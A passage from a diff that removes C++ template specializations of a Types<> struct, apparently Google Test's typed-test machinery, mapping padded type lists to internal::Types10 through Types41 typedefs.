-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None> {
-  typedef internal::Types10<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10> type;
-};
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11>
-struct Types<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None> {
-  typedef internal::Types11<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11> type;
-};
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12>
-struct Types<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None> {
-  typedef internal::Types12<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11,
-      T12> type;
-};
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12, typename T13>
-struct Types<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None> {
-  typedef internal::Types13<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12,
-      T13> type;
-};
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12, typename T13, typename T14>
-struct Types<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None> {
-  typedef internal::Types14<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12,
-      T13, T14> type;
-};
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12, typename T13, typename T14, typename T15>
-struct Types<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14, T15,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None> {
-  typedef internal::Types15<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12,
-      T13, T14, T15> type;
-};
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12, typename T13, typename T14, typename T15,
-    typename T16>
-struct Types<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14, T15,
-    T16, internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None> {
-  typedef internal::Types16<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12,
-      T13, T14, T15, T16> type;
-};
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12, typename T13, typename T14, typename T15,
-    typename T16, typename T17>
-struct Types<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14, T15,
-    T16, T17, internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None> {
-  typedef internal::Types17<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12,
-      T13, T14, T15, T16, T17> type;
-};
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12, typename T13, typename T14, typename T15,
-    typename T16, typename T17, typename T18>
-struct Types<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14, T15,
-    T16, T17, T18, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None> {
-  typedef internal::Types18<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12,
-      T13, T14, T15, T16, T17, T18> type;
-};
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12, typename T13, typename T14, typename T15,
-    typename T16, typename T17, typename T18, typename T19>
-struct Types<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14, T15,
-    T16, T17, T18, T19, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None> {
-  typedef internal::Types19<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12,
-      T13, T14, T15, T16, T17, T18, T19> type;
-};
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12, typename T13, typename T14, typename T15,
-    typename T16, typename T17, typename T18, typename T19, typename T20>
-struct Types<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14, T15,
-    T16, T17, T18, T19, T20, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None> {
-  typedef internal::Types20<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12,
-      T13, T14, T15, T16, T17, T18, T19, T20> type;
-};
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12, typename T13, typename T14, typename T15,
-    typename T16, typename T17, typename T18, typename T19, typename T20,
-    typename T21>
-struct Types<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14, T15,
-    T16, T17, T18, T19, T20, T21, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None> {
-  typedef internal::Types21<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12,
-      T13, T14, T15, T16, T17, T18, T19, T20, T21> type;
-};
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12, typename T13, typename T14, typename T15,
-    typename T16, typename T17, typename T18, typename T19, typename T20,
-    typename T21, typename T22>
-struct Types<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14, T15,
-    T16, T17, T18, T19, T20, T21, T22, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None> {
-  typedef internal::Types22<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12,
-      T13, T14, T15, T16, T17, T18, T19, T20, T21, T22> type;
-};
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12, typename T13, typename T14, typename T15,
-    typename T16, typename T17, typename T18, typename T19, typename T20,
-    typename T21, typename T22, typename T23>
-struct Types<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14, T15,
-    T16, T17, T18, T19, T20, T21, T22, T23, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None> {
-  typedef internal::Types23<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12,
-      T13, T14, T15, T16, T17, T18, T19, T20, T21, T22, T23> type;
-};
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12, typename T13, typename T14, typename T15,
-    typename T16, typename T17, typename T18, typename T19, typename T20,
-    typename T21, typename T22, typename T23, typename T24>
-struct Types<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14, T15,
-    T16, T17, T18, T19, T20, T21, T22, T23, T24, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None> {
-  typedef internal::Types24<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12,
-      T13, T14, T15, T16, T17, T18, T19, T20, T21, T22, T23, T24> type;
-};
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12, typename T13, typename T14, typename T15,
-    typename T16, typename T17, typename T18, typename T19, typename T20,
-    typename T21, typename T22, typename T23, typename T24, typename T25>
-struct Types<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14, T15,
-    T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None> {
-  typedef internal::Types25<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12,
-      T13, T14, T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25> type;
-};
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12, typename T13, typename T14, typename T15,
-    typename T16, typename T17, typename T18, typename T19, typename T20,
-    typename T21, typename T22, typename T23, typename T24, typename T25,
-    typename T26>
-struct Types<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14, T15,
-    T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None> {
-  typedef internal::Types26<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12,
-      T13, T14, T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25,
-      T26> type;
-};
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12, typename T13, typename T14, typename T15,
-    typename T16, typename T17, typename T18, typename T19, typename T20,
-    typename T21, typename T22, typename T23, typename T24, typename T25,
-    typename T26, typename T27>
-struct Types<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14, T15,
-    T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26, T27, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None> {
-  typedef internal::Types27<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12,
-      T13, T14, T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26,
-      T27> type;
-};
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12, typename T13, typename T14, typename T15,
-    typename T16, typename T17, typename T18, typename T19, typename T20,
-    typename T21, typename T22, typename T23, typename T24, typename T25,
-    typename T26, typename T27, typename T28>
-struct Types<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14, T15,
-    T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26, T27, T28,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None> {
-  typedef internal::Types28<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12,
-      T13, T14, T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26,
-      T27, T28> type;
-};
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12, typename T13, typename T14, typename T15,
-    typename T16, typename T17, typename T18, typename T19, typename T20,
-    typename T21, typename T22, typename T23, typename T24, typename T25,
-    typename T26, typename T27, typename T28, typename T29>
-struct Types<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14, T15,
-    T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26, T27, T28, T29,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None> {
-  typedef internal::Types29<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12,
-      T13, T14, T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26,
-      T27, T28, T29> type;
-};
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12, typename T13, typename T14, typename T15,
-    typename T16, typename T17, typename T18, typename T19, typename T20,
-    typename T21, typename T22, typename T23, typename T24, typename T25,
-    typename T26, typename T27, typename T28, typename T29, typename T30>
-struct Types<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14, T15,
-    T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26, T27, T28, T29, T30,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None> {
-  typedef internal::Types30<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12,
-      T13, T14, T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26,
-      T27, T28, T29, T30> type;
-};
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12, typename T13, typename T14, typename T15,
-    typename T16, typename T17, typename T18, typename T19, typename T20,
-    typename T21, typename T22, typename T23, typename T24, typename T25,
-    typename T26, typename T27, typename T28, typename T29, typename T30,
-    typename T31>
-struct Types<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14, T15,
-    T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26, T27, T28, T29, T30,
-    T31, internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None> {
-  typedef internal::Types31<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12,
-      T13, T14, T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26,
-      T27, T28, T29, T30, T31> type;
-};
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12, typename T13, typename T14, typename T15,
-    typename T16, typename T17, typename T18, typename T19, typename T20,
-    typename T21, typename T22, typename T23, typename T24, typename T25,
-    typename T26, typename T27, typename T28, typename T29, typename T30,
-    typename T31, typename T32>
-struct Types<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14, T15,
-    T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26, T27, T28, T29, T30,
-    T31, T32, internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None> {
-  typedef internal::Types32<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12,
-      T13, T14, T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26,
-      T27, T28, T29, T30, T31, T32> type;
-};
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12, typename T13, typename T14, typename T15,
-    typename T16, typename T17, typename T18, typename T19, typename T20,
-    typename T21, typename T22, typename T23, typename T24, typename T25,
-    typename T26, typename T27, typename T28, typename T29, typename T30,
-    typename T31, typename T32, typename T33>
-struct Types<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14, T15,
-    T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26, T27, T28, T29, T30,
-    T31, T32, T33, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None> {
-  typedef internal::Types33<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12,
-      T13, T14, T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26,
-      T27, T28, T29, T30, T31, T32, T33> type;
-};
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12, typename T13, typename T14, typename T15,
-    typename T16, typename T17, typename T18, typename T19, typename T20,
-    typename T21, typename T22, typename T23, typename T24, typename T25,
-    typename T26, typename T27, typename T28, typename T29, typename T30,
-    typename T31, typename T32, typename T33, typename T34>
-struct Types<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14, T15,
-    T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26, T27, T28, T29, T30,
-    T31, T32, T33, T34, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None> {
-  typedef internal::Types34<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12,
-      T13, T14, T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26,
-      T27, T28, T29, T30, T31, T32, T33, T34> type;
-};
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12, typename T13, typename T14, typename T15,
-    typename T16, typename T17, typename T18, typename T19, typename T20,
-    typename T21, typename T22, typename T23, typename T24, typename T25,
-    typename T26, typename T27, typename T28, typename T29, typename T30,
-    typename T31, typename T32, typename T33, typename T34, typename T35>
-struct Types<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14, T15,
-    T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26, T27, T28, T29, T30,
-    T31, T32, T33, T34, T35, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None> {
-  typedef internal::Types35<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12,
-      T13, T14, T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26,
-      T27, T28, T29, T30, T31, T32, T33, T34, T35> type;
-};
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12, typename T13, typename T14, typename T15,
-    typename T16, typename T17, typename T18, typename T19, typename T20,
-    typename T21, typename T22, typename T23, typename T24, typename T25,
-    typename T26, typename T27, typename T28, typename T29, typename T30,
-    typename T31, typename T32, typename T33, typename T34, typename T35,
-    typename T36>
-struct Types<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14, T15,
-    T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26, T27, T28, T29, T30,
-    T31, T32, T33, T34, T35, T36, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None> {
-  typedef internal::Types36<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12,
-      T13, T14, T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26,
-      T27, T28, T29, T30, T31, T32, T33, T34, T35, T36> type;
-};
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12, typename T13, typename T14, typename T15,
-    typename T16, typename T17, typename T18, typename T19, typename T20,
-    typename T21, typename T22, typename T23, typename T24, typename T25,
-    typename T26, typename T27, typename T28, typename T29, typename T30,
-    typename T31, typename T32, typename T33, typename T34, typename T35,
-    typename T36, typename T37>
-struct Types<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14, T15,
-    T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26, T27, T28, T29, T30,
-    T31, T32, T33, T34, T35, T36, T37, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None> {
-  typedef internal::Types37<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12,
-      T13, T14, T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26,
-      T27, T28, T29, T30, T31, T32, T33, T34, T35, T36, T37> type;
-};
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12, typename T13, typename T14, typename T15,
-    typename T16, typename T17, typename T18, typename T19, typename T20,
-    typename T21, typename T22, typename T23, typename T24, typename T25,
-    typename T26, typename T27, typename T28, typename T29, typename T30,
-    typename T31, typename T32, typename T33, typename T34, typename T35,
-    typename T36, typename T37, typename T38>
-struct Types<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14, T15,
-    T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26, T27, T28, T29, T30,
-    T31, T32, T33, T34, T35, T36, T37, T38, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None> {
-  typedef internal::Types38<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12,
-      T13, T14, T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26,
-      T27, T28, T29, T30, T31, T32, T33, T34, T35, T36, T37, T38> type;
-};
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12, typename T13, typename T14, typename T15,
-    typename T16, typename T17, typename T18, typename T19, typename T20,
-    typename T21, typename T22, typename T23, typename T24, typename T25,
-    typename T26, typename T27, typename T28, typename T29, typename T30,
-    typename T31, typename T32, typename T33, typename T34, typename T35,
-    typename T36, typename T37, typename T38, typename T39>
-struct Types<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14, T15,
-    T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26, T27, T28, T29, T30,
-    T31, T32, T33, T34, T35, T36, T37, T38, T39, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None> {
-  typedef internal::Types39<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12,
-      T13, T14, T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26,
-      T27, T28, T29, T30, T31, T32, T33, T34, T35, T36, T37, T38, T39> type;
-};
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12, typename T13, typename T14, typename T15,
-    typename T16, typename T17, typename T18, typename T19, typename T20,
-    typename T21, typename T22, typename T23, typename T24, typename T25,
-    typename T26, typename T27, typename T28, typename T29, typename T30,
-    typename T31, typename T32, typename T33, typename T34, typename T35,
-    typename T36, typename T37, typename T38, typename T39, typename T40>
-struct Types<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14, T15,
-    T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26, T27, T28, T29, T30,
-    T31, T32, T33, T34, T35, T36, T37, T38, T39, T40, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None> {
-  typedef internal::Types40<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12,
-      T13, T14, T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26,
-      T27, T28, T29, T30, T31, T32, T33, T34, T35, T36, T37, T38, T39,
-      T40> type;
-};
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12, typename T13, typename T14, typename T15,
-    typename T16, typename T17, typename T18, typename T19, typename T20,
-    typename T21, typename T22, typename T23, typename T24, typename T25,
-    typename T26, typename T27, typename T28, typename T29, typename T30,
-    typename T31, typename T32, typename T33, typename T34, typename T35,
-    typename T36, typename T37, typename T38, typename T39, typename T40,
-    typename T41>
-struct Types<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14, T15,
-    T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26, T27, T28, T29, T30,
-    T31, T32, T33, T34, T35, T36, T37, T38, T39, T40, T41, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None> {
-  typedef internal::Types41<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12,
-      T13, T14, T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26,
